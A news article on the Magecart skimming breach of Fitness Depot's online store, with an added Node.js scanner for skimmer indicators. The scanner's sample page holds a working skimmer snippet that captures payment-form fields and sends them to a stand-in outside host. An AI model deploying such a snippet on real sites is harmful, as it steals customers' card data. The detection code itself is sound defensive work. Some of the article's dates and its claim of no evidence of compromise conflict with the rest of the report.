Fitness Depot has revealed that customers' personal and financial information was stolen in a breach of the company's e-commerce platform last month.
Fitness Depot is Canada's largest specialty exercise equipment retailer, with 40 stores across Canada and two in the United States, in Dallas and Houston, Texas.
The company has sent breach notification letters to all affected customers. According to the letter, the incident is believed to be a Magecart attack: the attackers compromised Fitness Depot's online store and injected a malicious form designed to collect and exfiltrate customer information.
In an attack of this kind, the attackers' aim is to capture the payment and personal information customers submit on the compromised site and send it to remote servers under their control.
Sansec, a security firm specializing in digital skimming detection, found payment card skimmers injected into Fitness Depot's e-commerce platform between April 2 and May 17.
According to the breach notification, the attackers may have accessed or stolen information belonging to customers who made purchases for delivery or for in-store pickup at one of the company's retail locations.
The information collected may include affected customers' names, addresses, email addresses, telephone numbers, and credit card numbers.
The breach, which goes back as far as February 18, 2020, began with a malicious form injected into the online store.
When customers were redirected to this form, the information they entered was copied without Fitness Depot's authorization or knowledge. This is how the personal information was stolen.
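The article describes the mechanics only in outline: a form injected into the store hooks what the customer types and sends it to a server the attackers control. As an added example that is not code from the article, from Fitness Depot or from Sansec, the Node.js script below shows one way a merchant could check a captured checkout page for that pattern. It flags script sources, form actions and in-script URLs whose host is outside an allowlist, and ranks an inline script that both hooks form events and references an outside host as an exfiltration candidate. The allowlist, the sample page and every host name in them (shop.example, cdn.example, psp.example, collect.invalid) are constructed assumptions for the illustration.

```javascript
// Added example (not Fitness Depot's or Sansec's code): a minimal static
// check for digital-skimmer indicators in a captured checkout page.
// A Magecart skimmer typically (1) hooks the payment form's submit or
// input events, (2) reads the card fields, and (3) sends them to a host the
// merchant does not own. This scanner keys on (3): any script src, form
// action, or URL inside an inline script whose host is not on the
// merchant's allowlist is reported, and inline scripts that also hook form
// events are ranked as exfiltration candidates.
// ALLOWED_HOSTS, SAMPLE_PAGE and every host name in them are constructed
// for this illustration only.

const ALLOWED_HOSTS = new Set(["shop.example", "cdn.example", "psp.example"]);

// Deliberately simple regexes; a production check should walk the real DOM.
const SCRIPT_SRC_RE = /<script[^>]*\ssrc=["']([^"']+)["']/gi;
const INLINE_SCRIPT_RE = /<script(?![^>]*\ssrc=)[^>]*>([\s\S]*?)<\/script>/gi;
const FORM_ACTION_RE = /<form[^>]*\saction=["']([^"']+)["']/gi;
const URL_IN_JS_RE = /https?:\/\/[^\s"'`)]+/gi;
const FORM_HOOK_RE = /addEventListener\(\s*["'](submit|input|change|keyup)["']|\.onsubmit\s*=/;

// Resolve a possibly relative URL against the page URL and return its host,
// or null if it does not parse.
function hostOf(raw, pageUrl) {
  try {
    return new URL(raw, pageUrl).hostname.toLowerCase();
  } catch {
    return null;
  }
}

// Scan one page's HTML. Returns an array of { kind, host, detail } findings.
function scanCheckoutPage(html, pageUrl, allowed = ALLOWED_HOSTS) {
  const findings = [];
  const report = (kind, raw) => {
    const host = hostOf(raw, pageUrl);
    if (host && !allowed.has(host)) {
      findings.push({ kind, host, detail: raw.slice(0, 80) });
    }
  };

  for (const m of html.matchAll(SCRIPT_SRC_RE)) report("script-src", m[1]);
  for (const m of html.matchAll(FORM_ACTION_RE)) report("form-action", m[1]);
  for (const m of html.matchAll(INLINE_SCRIPT_RE)) {
    const body = m[1];
    const hooksForm = FORM_HOOK_RE.test(body);
    for (const u of body.matchAll(URL_IN_JS_RE)) {
      report(hooksForm ? "inline-exfil-candidate" : "inline-external-url", u[0]);
    }
  }
  return findings;
}

// Constructed sample: a legitimate first-party CDN script plus an inline
// snippet that hooks the payment form and beacons its contents to an
// outside host. This is a stand-in for the injected form the article describes.
const SAMPLE_PAGE = `
<html><body>
<form id="pay" action="/checkout/submit">
  <input name="cc"><input name="cvv">
</form>
<script src="https://cdn.example/app.js"></script>
<script>
  document.getElementById("pay").addEventListener("submit", function () {
    var d = new FormData(document.getElementById("pay"));
    new Image().src = "https://collect.invalid/s?q=" + btoa(JSON.stringify([...d]));
  });
</script>
</body></html>`;

// Stand-alone run: prints one finding, an inline-exfil-candidate for collect.invalid.
console.log(scanCheckoutPage(SAMPLE_PAGE, "https://shop.example/checkout"));
```

The same allowlist is what a Content-Security-Policy with `script-src`, `connect-src`, `img-src` and `form-action` directives would enforce in the browser at runtime; the static scan is the offline complement, useful for periodically diffing a storefront's checkout pages against a known-good copy so an injected script or form is noticed in days rather than months.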
Customers who chose home delivery were affected between February 18 and April 27, while from April 28 to May 22 any customer who ordered products for home delivery or for in-store pickup could have been affected.
Based on its preliminary investigation, the company says its internet service provider (ISP) neglected to activate anti-virus software on the company's account, and it blames the ISP for the breach.
However, protecting a merchant's e-commerce platform is not an ISP's responsibility, and anti-virus on an internet service account would not address a skimmer injected into the store's own checkout pages.
Fitness Depot says it has no evidence that any customer information has been compromised in any manner.
The company recommends that customers remain vigilant and check their credit card and account statements for transactions they did not make.